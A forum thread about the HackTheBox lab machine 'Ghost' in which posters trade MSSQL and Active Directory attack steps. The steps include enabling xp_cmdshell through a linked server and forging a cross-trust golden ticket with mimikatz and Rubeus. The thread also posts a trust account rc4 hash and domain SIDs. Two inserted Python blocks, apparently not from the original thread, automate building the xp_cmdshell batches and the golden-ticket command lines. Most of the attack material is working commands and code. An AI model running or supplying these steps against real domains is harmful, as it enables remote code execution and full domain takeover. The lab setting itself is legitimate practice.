Ghost - Insane
by f4k3h4ck3r - Saturday July 13, 2024 at 03:43 PM
(Jul 15, 2024, 09:59 AM)wh1t3_r4bb1t Wrote:
(Jul 15, 2024, 08:32 AM)bmoon10 Wrote:
(Jul 15, 2024, 07:40 AM)wh1t3_r4bb1t Wrote: If someone is stuck with MSSQL, two things were missed in the thread:
SQL > enum_links
SQL > use_link [PRIMARY]
SQL > use master
SQL > exec_as_login sa
SQL > EXEC sp_configure 'show advanced options', 1
SQL > RECONFIGURE
SQL > EXEC sp_configure 'xp_cmdshell', 1
SQL > RECONFIGURE
SQL > xp_cmdshell "whoami"

In the impacket-mssqlclient utility, after the 'exec_as_login sa' step, use the enable_xp_cmdshell command. It executes the same 4 lines (EXEC sp_configure, RECONFIGURE, etc.).

No, I was getting the "let administrator enable xp_cmdshell" message after it, so I needed to enable it manually.
UPD: oh, you mean "enable_xp_cmdshell", got it.

What is next after getting a shell as mssqlserver?

Reply
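The T-SQL that the mssqlclient commands in the post above (enum_links, use_link, exec_as_login, enable_xp_cmdshell) actually send, written out as an added example so the same steps can be driven from any MSSQL client; this is not code from the thread or from impacket. The target address, credentials and link name in main() are assumptions, and the row-dict shape used by xp_cmdshell_on is a constructed sample of what the check query returns.

```python
# Added example: the statements behind mssqlclient's enum_links / use_link /
# exec_as_login / enable_xp_cmdshell, plus a check that xp_cmdshell really
# came on. Connection details in main() are assumptions.

# "enum_links": linked servers and whether RPC Out is enabled on them.
# EXEC ('...') AT [link] needs RPC Out; OPENQUERY does not, but cannot RECONFIGURE.
ENUM_LINKS = (
    "SELECT name, product, provider, data_source, is_rpc_out_enabled "
    "FROM sys.servers WHERE is_linked = 1"
)

# The four statements behind "enable_xp_cmdshell", in order.
ENABLE_XP_CMDSHELL = [
    "EXEC sp_configure 'show advanced options', 1",
    "RECONFIGURE",
    "EXEC sp_configure 'xp_cmdshell', 1",
    "RECONFIGURE",
]

# Verification: value_in_use is what the server is actually running with.
CHECK_XP_CMDSHELL = (
    "SELECT CAST(value_in_use AS int) AS value_in_use "
    "FROM sys.configurations WHERE name = 'xp_cmdshell'"
)


def tsql_quote(text: str) -> str:
    """Double single quotes so a statement survives being nested in EXEC('...')."""
    return text.replace("'", "''")


def at_link(statement: str, link: str) -> str:
    """Run `statement` on linked server `link` (what "use_link" does under the hood)."""
    return "EXEC ('%s') AT [%s]" % (tsql_quote(statement), link.replace("]", "]]"))


def enable_and_run_via_link(link: str, command: str, login: str = "sa") -> str:
    """One batch: impersonate `login`, enable xp_cmdshell, run `command` on `link`.

    Everything goes into a single EXEC ... AT batch because EXECUTE AS LOGIN
    only lasts for the remote batch it is issued in.
    """
    statements = (
        ["EXECUTE AS LOGIN = '%s'" % tsql_quote(login)]
        + ENABLE_XP_CMDSHELL
        + ["EXEC master..xp_cmdshell '%s'" % tsql_quote(command)]
    )
    return at_link("; ".join(statements), link)


def xp_cmdshell_on(rows) -> bool:
    """Interpret the rows returned by CHECK_XP_CMDSHELL (list of dicts, one per row)."""
    return any(int(row.get("value_in_use", 0)) == 1 for row in rows)


def main():
    # Assumed impacket API (impacket.tds.MSSQL) against an assumed target;
    # not executed on import.
    from impacket import tds
    conn = tds.MSSQL("10.0.0.1", 1433)
    conn.connect()
    conn.login("master", "user", "password", "", None, False)
    conn.sql_query(ENUM_LINKS)
    conn.printRows()
    conn.sql_query(enable_and_run_via_link("PRIMARY", "whoami"))
    conn.printRows()
    conn.sql_query(at_link(CHECK_XP_CMDSHELL, "PRIMARY"))
    print("xp_cmdshell enabled:", xp_cmdshell_on(conn.rows))
    conn.disconnect()


if __name__ == "__main__":
    main()
```

The quote-doubling in tsql_quote is the part people get wrong by hand: every single quote inside the remote batch has to be doubled once per level of EXEC nesting, otherwise the linked server returns a syntax error rather than "access denied" and it looks like a permissions problem.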
(Jul 15, 2024, 11:02 AM)spamdegratis5 Wrote:
(Jul 15, 2024, 10:58 AM)bmoon10 Wrote:
(Jul 15, 2024, 10:01 AM)spamdegratis5 Wrote: I've got a hint for two different approaches, I haven't managed to exploit them, but I'll leave them here for someone smarter than me:
- In order to forge the golden ticket, the aes256 key must be used, the nt hash won't work
- Unconstrained delegation

I don't have more info, only that.


With mimikatz, a golden ticket can be obtained using the ghost$ rc4 hash and the corp.ghost.htb and ghost.htb SIDs.

Yeah, I know, but every ticket returns the error (both nthash and aeskey):
[-] Kerberos SessionError: KDC_ERR_TGT_REVOKED(TGT has been revoked)

Looking for a possible cause, maybe this is related? https://github.com/fortra/impacket/issues/1601 
Quote:When using NTLM hash of KRBTGT and Impacket's ticketer, you will need the "-user-id" flag.
Example:
impacket-ticketer -nthash $HASH -domain-sid $DOMAIN_SID -domain $DOMAIN -user-id $IDofUSER $NameOfUser
To get the user-id, you just need to use Mimikatz or others like WMIC ("wmic useraccount where name='joe' get sid")

Quote:That is because Windows from the update KB5008380 got a new PAC structure and a new check: KDC now checks if the user actually exists with the right RID. So now you need to make a ticket for an existing user with right RID with the flag -user-id as earlesshoichi mentioned before.

I'll try with an existing user.

Not sure where you are getting the ghost$ rc4 hash from. I've used the ghost$ rc4 hash from the meterpreter hashdump command to get the golden ticket (mimikatz for the TGT and Rubeus.exe for the TGS), and it worked.
Reply
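The exchange above comes down to three inputs that are easy to get wrong: the child domain SID (a bare S-1-5-21-A-B-C, not a principal SID with a RID on the end), the parent's Enterprise Admins SID (parent domain SID plus -519), and a RID that actually exists, since the KDC_ERR_TGT_REVOKED error is what the KB5008380 PAC requestor check produces when it doesn't. Below is an added example, not code from the thread or from impacket/mimikatz, that validates those inputs and assembles the two command lines the thread uses. The two domain SIDs are the ones posted in the thread; the key in the usage block is a placeholder; the binary SID encoding is the MS-DTYP layout used inside the PAC.

```python
# Added example: validate the SIDs/RID/key for a child->parent ticket and build
# the mimikatz and ticketer command lines the thread uses. The key value used
# in __main__ is a placeholder, not a real hash.
import re
import struct

ENTERPRISE_ADMINS_RID = 519   # well-known RID in the forest root domain
ADMINISTRATOR_RID = 500       # built-in Administrator; a RID the KDC can resolve

_SID_RE = re.compile(r"^S-1-(\d+)((?:-\d+)+)$")


def parse_sid(sid):
    """Split an SDDL SID into (identifier_authority, [sub_authorities])."""
    m = _SID_RE.match(sid)
    if not m:
        raise ValueError("not an SDDL SID: %r" % sid)
    return int(m.group(1)), [int(x) for x in m.group(2).split("-")[1:]]


def is_domain_sid(sid):
    """True for S-1-5-21-A-B-C only. S-1-5-21-A-B-C-RID is a principal SID,
    a common paste mistake for /sid: and -domain-sid."""
    auth, subs = parse_sid(sid)
    return auth == 5 and len(subs) == 4 and subs[0] == 21


def split_rid(sid):
    """(domain_sid, rid) for a domain principal SID such as <domain>-519."""
    auth, subs = parse_sid(sid)
    if auth != 5 or subs[0] != 21 or len(subs) != 5:
        raise ValueError("not a domain principal SID: %r" % sid)
    return "S-1-5-" + "-".join(str(s) for s in subs[:-1]), subs[-1]


def sid_to_bytes(sid):
    """Binary SID (MS-DTYP 2.4.2.2) as carried in the PAC: revision, count,
    48-bit big-endian authority, little-endian 32-bit sub-authorities."""
    auth, subs = parse_sid(sid)
    return (struct.pack("<BB", 1, len(subs)) + auth.to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))


def sid_from_bytes(data):
    """Inverse of sid_to_bytes, so a PAC-extracted SID can be compared as text."""
    rev, count = struct.unpack_from("<BB", data, 0)
    if rev != 1 or len(data) != 8 + 4 * count:
        raise ValueError("malformed binary SID")
    auth = int.from_bytes(data[2:8], "big")
    subs = struct.unpack_from("<%dI" % count, data, 8)
    return "S-1-%d-%s" % (auth, "-".join(str(s) for s in subs))


def trust_ticket_params(user, child_domain, child_sid, parent_domain, parent_sid,
                        key_hex, key_type="rc4", user_rid=ADMINISTRATOR_RID,
                        tool="mimikatz", ticket="trust.kirbi"):
    """Validate inputs and build one command line.

    tool="mimikatz": /service:krbtgt /target:<parent> forges a referral TGT, so
    key_hex must be the inter-realm trust key (the child's trust account hash,
    ghost$ in the thread).  tool="ticketer": key_hex is the child krbtgt key and
    the result is a child TGT whose PAC carries the parent's Enterprise Admins
    SID.  Either way the RID must belong to an existing account (KB5008380).
    """
    for name, sid in (("child", child_sid), ("parent", parent_sid)):
        if not is_domain_sid(sid):
            raise ValueError("%s SID must be a bare domain SID: %r" % (name, sid))
    mk_flag, tk_flag, hex_len = {"rc4": ("rc4", "nthash", 32),
                                 "aes256": ("aes256", "aesKey", 64)}[key_type]
    if not re.fullmatch(r"[0-9a-fA-F]{%d}" % hex_len, key_hex):
        raise ValueError("%s key must be %d hex chars" % (key_type, hex_len))
    extra_sid = "%s-%d" % (parent_sid, ENTERPRISE_ADMINS_RID)
    if tool == "mimikatz":
        cmd = ("kerberos::golden /user:%s /domain:%s /sid:%s /sids:%s /id:%d /%s:%s "
               "/service:krbtgt /target:%s /ticket:%s"
               % (user, child_domain, child_sid, extra_sid, user_rid, mk_flag,
                  key_hex, parent_domain, ticket))
    elif tool == "ticketer":
        cmd = ("ticketer.py -%s %s -domain-sid %s -domain %s -extra-sid %s -user-id %d %s"
               % (tk_flag, key_hex, child_sid, child_domain, extra_sid, user_rid, user))
    else:
        raise ValueError("tool must be 'mimikatz' or 'ticketer'")
    return {"extra_sid": extra_sid, "command": cmd}


if __name__ == "__main__":
    p = trust_ticket_params("Administrator", "corp.ghost.htb",
                            "S-1-5-21-2034262909-2733679486-179904498",
                            "ghost.htb", "S-1-5-21-4084500788-938703357-3654145966",
                            key_hex="0" * 32)   # placeholder key
    print(p["command"])
```

is_domain_sid rejects the SID-with-RID form because mimikatz and ticketer will happily accept it and produce a ticket whose domain SID is wrong, which also fails with a Kerberos error rather than a clear message.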
(Jul 15, 2024, 11:19 AM)bmoon10 Wrote:
Not sure where you are getting the ghost$ rc4 hash from. I've used the ghost$ rc4 hash from the meterpreter hashdump command to get the golden ticket (mimikatz for the TGT and Rubeus.exe for the TGS), and it worked.

Yep, it worked: I could read user.txt and root.txt. But how do I get a shell on dc01? I tried psexec but it fails.
Reply
(Jul 15, 2024, 11:30 AM)TxX Wrote:
OK... this way, or is something wrong?

/mimikatz "Kerberos::golden /user:Administrator /domain:corp.ghost.htb /sid:...498  /sids:...966 /rc4:..297 /service:krbtgt /target:ghost.htb /ticket:C:\temp\trust.kirbi" "exit"

./Rubeus.exe asktgs /ticket:trust.kirbi /dc:dc01.ghost.htb /service:CIFS/dc01.ghost.htb /nowrap /ptt

The ...966 SID seems to be different in my case; otherwise the commands look perfect.
Reply
In 10.0.0.10


kerberos::golden /user:Administrator /domain:CORP.GHOST.HTB /sid:S-1-5-21-2034262909-2733679486-179904498 /sids:S-1-5-21-4084500788-938703357-3654145966-519 /rc4:dae1ad83e2af14a379017f244a2f5297 /service:krbtgt /target:GHOST.HTB /ticket:golden.kirbi

.\rubeus.exe asktgs /ticket:golden.kirbi /service:cifs/DC01.ghost.htb /dc:DC01.ghost.htb /ptt /nowrap

dir \\DC01.ghost.htb\C$

Reply
(Jul 15, 2024, 11:49 AM)osamy7593 Wrote: In 10.0.0.10


kerberos::golden /user:Administrator /domain:CORP.GHOST.HTB /sid:S-1-5-21-2034262909-2733679486-179904498 /sids:S-1-5-21-4084500788-938703357-3654145966-519 /rc4:dae1ad83e2af14a379017f244a2f5297 /service:krbtgt /target:GHOST.HTB /ticket:golden.kirbi

.\rubeus.exe asktgs /ticket:golden.kirbi /service:cifs/DC01.ghost.htb /dc:DC01.ghost.htb /ptt /nowrap

dir \\DC01.ghost.htb\C$

Not sure if this is the intended way to get the flags, especially for an insane box.
Seems kind of easy compared to Mist and Corporate (insane boxes).
Reply
(Jul 15, 2024, 11:49 AM)osamy7593 Wrote: In 10.0.0.10

I'm still getting an error; could you please tell me which commands you used?

Reply
(Jul 15, 2024, 12:02 PM)myhem Wrote:
I'm still getting an error; could you please tell me which commands you used?

dir \\DC01.ghost.htb\C$ returns access denied if there are issues with the tickets.
If both the TGT and the TGS work properly, you won't face issues with the dir command.
Reply
(Jul 15, 2024, 11:35 AM)jsvensson Wrote:
Yep, it worked: I could read user.txt and root.txt. But how do I get a shell on dc01? I tried psexec but it fails.

One of the usual possibilities with Cobalt Strike: once you have full access to the DC, you can upload your payload via SMB and spawn it remotely to get access to the DC.

https://www.youtube.com/watch?v=dDAz13wmCk8
https://www.youtube.com/watch?v=GI-vvX_OBd4
https://www.youtube.com/watch?v=QuU_u-yu8Lc
Reply
(Jul 15, 2024, 12:03 PM)spamdegratis5 Wrote:
(Jul 15, 2024, 12:01 PM)bmoon10 Wrote:
Not sure if this is the intended way to get the flags, especially for an insane box.
Seems kind of easy compared to Mist and Corporate (insane boxes).
I think this is the unintended way; the intended one should be related to the ADFS account and justin.bradley.

Exploiting the bidirectional trust like this is another AD vulnerability in itself.
Technically, corp.ghost.htb getting full access to ghost.htb seems right in this case.
The only issue is getting a shell on dc01 (though it might be irrelevant?).
Reply

